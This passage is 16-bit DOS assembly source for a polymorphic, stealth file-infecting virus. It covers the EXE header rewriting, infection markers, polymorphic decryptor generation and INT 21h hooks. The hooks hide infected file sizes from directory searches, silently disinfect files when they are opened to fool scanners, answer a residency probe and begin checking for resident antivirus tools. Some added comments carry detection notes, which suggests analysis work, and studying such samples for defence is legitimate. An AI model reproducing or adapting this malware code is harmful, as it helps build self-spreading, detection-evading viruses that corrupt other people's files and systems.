inc si ; header manipulation start here
sub ax, word ptr [si+7] ; subtract header size
sbb dx, 0 ; 32-bit
mov word ptr [si+15h], ax ; NEW CS
mov word ptr [si+13h], dx ; NEW IP
mov delta, dx
inc ax
mov word ptr [si+0Dh], ax ; NEW SS=CS+1
add ax, 23
rol ax, 1
mov word ptr [si+11h], ax ; infection marker #1
mov polykey, ax ; static polymorphic key
get_key:
and al, 0Fh ; make al < or = 0Fh
or al, al ;
jnz goodkey ; if got 0
inc al ; then make 1
goodkey: mov byte ptr [crypt], al ; for encrypt_decrypt
mov byte ptr [crypt2], al ; for encrypt_decrypt2
mov ch, 16 ;
sub ch, al
mov byte ptr [rotdecrypt],ch ; for encrypt_decrypt
test al, 1 ; random use ror or rol for crypt
jne use_rorah ;
use_rolal: mov byte ptr [scratch],0c0h ; rol al,cl
mov byte ptr [alorah1],05h
mov byte ptr [alorah2],05h
jmp short here
use_rorah: mov byte ptr [scratch],0cch ; ror ah,cl
mov byte ptr [alorah1],25h
mov byte ptr [alorah2],25h
here:
mov word ptr [si+0Fh], 0 ; NEW SP
add word ptr [si+09h],(heap-startvirus)/16 + 1
push si
push di
push bx
mov bx, 3 ; Polymorphics
lea si, [cctable] ;
lea di, [clearcarry2] ;
call polymorph ;
lea di, [clearcarry3] ;
call polymorph ;
lea si, [movax305table] ;
lea di, [movax305] ;
call polymorph ;
lea si, [incditable] ;
lea di, [incdi] ;
call polymorph ;
lea si, [subbxbxtable] ;
lea di, [subbxbx] ;
call polymorph ;
lea si, [movsibptable] ;
lea di, [movsibp] ;
call polymorph ;
lea si, [oredxedxtable] ;
lea di, [oredxedx] ;
call polymorph ;
lea si, [movdi14table] ;
lea di, [movdi14] ;
call polymorph ;
lea si, [adddisitable] ;
lea di, [adddisi] ;
call polymorph ;
mov bx, 2 ; Polymorphics
lea si, [jumpctable] ;
lea di, [jumpc] ;
call polymorph ;
lea si, [jumpztable] ;
lea di, [jumpz] ;
call polymorph ;
lea si, [decedxtable] ;
lea di, [decedx] ;
call polymorph ;
pop bx
pop di
pop si
call getmins
add cx, offset (heap-startvirus)
mov ah, 40h
push si
push di
push es
call messup ; Write virus
pop es
pop di
pop si
mov ax, sizels
mov dx, sizems
add ax, offset heap ; file size + virus size
adc dx, 0
mov cx, 512
div cx
or dx, dx
jz noremainder
inc ax
noremainder: mov word ptr [si+1], dx
mov word ptr [si+3], ax
call movepointertotop
lea dx, [header] ; write from buffer
call writeheader
cont: mov ax, 5701h
mov cx, time
and cx, 0FFE0h
or cx, 000101b ; infection marker #2
mov dx, date
call simint21h
findquit:
popf
pop ds
pop es
pop di
pop dx
pop cx
pop bx
pop ax
pop si
jmp go_int
repservice:
; Residency ("are you there?") probe handler. The caller passes a pointer
; in DS:DX; if the byte it points to is '$' the handler answers with
; BX=3135h and returns directly, otherwise it chains to the original
; INT 21h vector. Detection note: the BX=3135h reply is a fixed,
; observable identification value for this resident code.
pop si ; presumably the SI saved by the dispatcher before jumping here — confirm against caller
push di
mov di, dx ; DS:DI = DS:DX (pointer argument)
cmp byte ptr ds:[di], '$' ; first byte '$' => this is the probe
pop di
jne go_int ; not the probe: chain to the original INT 21h
mov bx, 3135h ; reply value for the probe
iret
; -------------------------------------------------------------------------
; INT 21 ah=4eh, 4fh stealth
; -------------------------------------------------------------------------
findstealth:
; Stealth hook for INT 21h AH=4Eh/4Fh (handle-based FindFirst/FindNext):
; lets DOS perform the search, then, if the returned DTA entry carries
; infection marker #2, reduces the file size reported in the DTA so an
; infected file appears to have its original length. Detection note: the
; size seen through this hook disagrees with the on-disk size.
call simint21h ; run the real FindFirst/FindNext
jc endfs ; search failed: nothing to hide
cmp cs:[stealthon], 0 ; stealth disabled?
jz endfs ; then return the result unmodified
push es
push cx
push bx
push ax
push di
mov ah, 2fh ; current dta (AH=2Fh: get DTA address)
call simint21h ; ES:BX -> DTA
xchg di, bx ; ES:DI -> DTA
mov si, di
add di, 16h ; DI -> DTA+16h, time field of the found entry
add si, 1ah ; SI -> DTA+1Ah, 32-bit size field of the found entry
call searchstcommon ; check marker #2 and adjust the size in place
pop di
pop ax
pop bx
pop cx
pop es
clc ; no error
endfs:
pop si ; presumably the SI saved by the dispatcher — confirm against caller
retf 2 ; far return, discarding the flags image pushed by INT so the CF set here reaches the caller
; -------------------------------------------------------------------------
; INT 21 ah=11h, 12h stealth
; -------------------------------------------------------------------------
dirstealth:
; Stealth hook for INT 21h AH=11h/12h (FCB FindFirst/FindNext): same idea
; as findstealth, but here the DTA holds a drive byte followed by a
; directory entry, optionally preceded by a 7-byte extended-FCB prefix.
call simint21h ; call the interrupt
or al, al ; AL=0 means an entry was returned
jne endds ; AL=FFh (no match): nothing to hide
cmp cs:[stealthon], 0 ; is stealthoff?
jz endds ; then quit
push es
push cx
push bx
push ax
push di
mov ah, 2fh ; get current DTA address
call simint21h ; ES:BX -> DTA
xchg di, bx ; ES:DI -> DTA
mov bl, byte ptr es:[di] ; extended FCB
xor bl, 0ffh ; first byte FFh => extended FCB prefix present
jne notextended
add di, 7h ; fix for extended: skip the 7-byte prefix
notextended:
mov si, di
add di, 17h ; DI -> time field (drive byte + directory-entry offset 16h)
add si, 1dh ; SI -> 32-bit size field (drive byte + directory-entry offset 1Ch)
call searchstcommon ; check marker #2 and adjust the size in place
pop di
pop ax
pop bx
pop cx
pop es
endds:
pop si ; presumably the SI saved by the dispatcher — confirm against caller
iret
;----------------------------------------------------------------------------
; SEARCH STEALTH COMMON ROUTINE BETWEEN INT 11/12, 4E/4F
;----------------------------------------------------------------------------
searchstcommon:
;Entry: di=searchtimeaddr, si=searchsizeaddr
; Shared by the AH=11h/12h and AH=4Eh/4Fh hooks. ES:DI -> 16-bit DOS time
; field, ES:SI -> 32-bit file size. If the seconds/2 field (low 5 bits of
; the time) equals infection marker #2 (00101b) and the file is at least
; 5000 bytes, the reported size is reduced by the virus body length plus
; the value of the minutes field. Detection note: the same fixed
; seconds/2 value appearing on many files is itself an indicator.
; Clobbers: ax, bx, cl, flags; writes the size field at ES:[SI].
mov ax, word ptr es:[di] ; ax = time field
mov bx, ax
and ax, 011111b ; low 5 bits = seconds/2
xor ax, 000101b ; compare against marker #2
jne commonquit ; is marker #2 set?
mov cl, 5
shr bx, cl
and bx, 0111111b ; bx = minutes field (bits 5..10)
cmp word ptr es:[si+2], 0 ; file big enough to stealth?
jnz st1 ; high word nonzero: certainly big enough
cmp word ptr es:[si], 5000 ; file big enough to stealth?
jb commonquit ; it is not
st1:
add bx, offset (heap-startvirus) ; bx = virus length + minutes value (presumably the length of appended data; cleanvirus seeks back using getmins — confirm)
sub word ptr es:[si], bx ; subtract the file length
sbb word ptr es:[si+2], 0 ; 32-bit
commonquit:
ret
; -------------------------------------------------------------------------
; Cleanvirus on OPEN 3dh
; -------------------------------------------------------------------------
cleanvirus:
; INT 21h open hook (AH=3Dh and AH=6Ch): transparently disinfects the
; file being opened so that whoever reads it afterwards (e.g. a scanner)
; sees the clean original. Sequence: open read-only, locate the SFT
; entry, check for an "EX" extension and marker #2, read and decrypt the
; stored original header from near the end of the file, write it back
; over the infected header, truncate the appended virus body, restore
; the saved time/date, close. Registers pushed at entry are restored
; before control far-jumps to the original INT 21h vector (go_int).
pop si ; presumably the SI saved by the dispatcher — confirm against caller
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
pushf
cmp ah, 6ch ; is it int 21h ah=6ch?
jne skip6c
mov dx, si ; DS:DX now filename (AH=6Ch passes it in DS:SI)
skip6c:
call checkdrive ; is it floppy?
jb stealthexit ; then quit
cmp cs:[stealthon], 0 ; is stealthoff?
jz stealthexit ; then quit
mov ax, 3d00h ; Open read only
call simint21h
jc stealthexit ; quit if cant open
goodopen: xchg bx, ax ; bx = file handle
push cs
pop ds ; ds = cs (resident data segment)
call sft ; presumably ES:DI -> SFT entry for handle bx — confirm in sft
cmp word ptr es:[di+28h], 'XE' ; extension field at SFT+28h starts with "EX"?
jne stealthquit
call checkmarker ; is marker #2 set?
jnz stealthquit ; else quit
mov ax,word ptr es:[di+11h] ; file size (dword at SFT+11h)
mov dx,word ptr es:[di+13h]
mov sizels, ax
mov sizems, dx
call getmins
add cx, 1ch ; original header (1Ch bytes) sits 1Ch+mins bytes before EOF
sub ax, cx ; move to where original header is
sbb dx, 0
mov word ptr es:[di+15h],ax ; file pointer (dword at SFT+15h), set directly in the SFT
mov word ptr es:[di+17h],dx
lea dx, [origheader] ; read origheader
call readheader
jc stealthquit
call decryptheader
cmp byte ptr [si], 'M' ; was original header found and
jne stealthquit ; reconstructed correctly? (presumably SI -> decrypted header here — confirm in decryptheader)
call movepointertotop ; TOF via SFT
call writeheader ; put the original header back at offset 0
jc stealthquit ; quit if cant disinfect
mov ax, sizels
mov dx, sizems
call getmins
add cx, offset heap ; bytes to remove from the end: virus body + padding
sub ax, cx
sbb dx, 0
mov word ptr es:[di+15h],ax ; file pointer
mov word ptr es:[di+17h],dx
mov ah, 40h ; erase virus from original file
xor cx, cx ; write of 0 bytes truncates at the current position
call simint21h
mov ax, 5701h
mov cx, time
mov dx, date
call simint21h ; restore original time & date
stealthquit: mov ah, 3eh ; close handle in bx
call simint21h
stealthexit:
popf
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
go_int:
db 0eah ; jmp ssss:oooo — far jump to the saved original INT 21h vector
int21o dw ? ; original INT 21h offset
int21s dw ? ; original INT 21h segment
; -----------------------------------------------------------------------
; Scan MCBs for resident AV software
; -----------------------------------------------------------------------
; entry DI=0
; return ZF=0 if none found
; return ZF=1 if one found
checkresav:
push es
push ds